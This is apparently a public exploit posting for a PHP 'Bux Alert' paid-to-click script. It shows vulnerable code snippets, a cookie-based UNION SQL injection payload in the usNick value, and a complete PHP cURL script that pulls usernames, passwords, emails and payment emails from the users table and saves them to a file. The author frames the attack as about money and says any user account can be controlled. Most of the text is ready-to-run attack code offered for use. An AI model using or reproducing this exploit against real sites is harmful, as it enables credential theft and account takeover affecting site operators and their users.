Inject in cookiws usNick usNick=i-Hmx'/*! union all select 1,(select group_concat(username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 and 'faris'='1337 require('config.php'); $lole=$_COOKIE["usNick"]; $tabla = mysql_query("SELECT * FROM tb_users where referer='$lole' ORDER BY id ASC"); mysql_close($con); while ($row = mysql_fetch_array($tabla)) { sendsms.php , surf.php , almost all php files are cookies injectable under cookie value usNick /messenger.php?option=delete&id=1%injecthere% if ($option=="delete"){ require ('config.php'); //Todo parece correcto procedemos con la inserccion $queryz = "DELETE FROM tb_messenger WHERE id='$id' LIMIT 1"; mysql_query($queryz) or die(mysql_error()); mysql_close($con); echo "Message has been deleted.

"; } /purchase.php if (isset($_POST["customer"])) { $refset=$_POST["refset"]; require('config.php'); $queryx = mysql_query("SELECT sets FROM tb_buyref WHERE id='1' and refnum='$refset'") or die(mysql_error()); Fuck Injection , it's all abt money anyway :D You can control ay user via usNick cookie value */ if(!$argv[1]) { echo "\n[+] usage : php ".$argv[0]." [Target]\nex : php ".$argv[0]." http://site.com/bux/\n"; exit(); } echo "[+] Bux Alert Sql Injection Exploit \n"; echo "[-] Exploited By i-Hmx \n"; echo "[-] sec4ever.com , 1337s.cc\n"; function kastr($string, $start, $end){ $string = " ".$string; $ini = strpos($string,$start); if ($ini == 0) return ""; $ini += strlen($start); $len = strpos($string,$end,$ini) - $ini; return substr($string,$ini,$len); } function faexploit($url){ $curl=curl_init(); curl_setopt($curl,CURLOPT_RETURNTRANSFER,1); curl_setopt($curl,CURLOPT_URL,$url."referals.php"); curl_setopt($curl,CURLOPT_COOKIE,"usNick=i-Hmx'/*! union all select 1,(select group_concat(0x666172736177797e,username,0x3a,password,0x3a,email,0x3a,pemail,0x3C62723E) from tb_users),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18*/ and 'faris'='1337"); curl_setopt($curl,CURLOPT_FOLLOWLOCATION,0); curl_setopt($curl,CURLOPT_TIMEOUT,20); $exec=curl_exec($curl); curl_close($curl); return $exec; } $kaf=faexploit($argv[1]); if(preg_match("/farsawy/",$kaf)){ $fadata= kastr($kaf,"",""); $kdata=str_replace("farsawy~","",$fadata); $kadata=str_replace(",","",$kdata); @unlink("result.htm"); $res=fopen("result.htm","w+"); fwrite($res,"| BuxAlert Sql Injection Vuln
| Exploited By i-Hmx
| sec4ever.com , 1337s.cc
-----------------------------------

User -- Password ---- Email ---- Paying email
".$kadata."
------------i-Hmx----------"); echo "[-] Result have been written to result.htm\n"; echo "[+] Done"; } else { echo "[-] Not vulnerable"; } ?>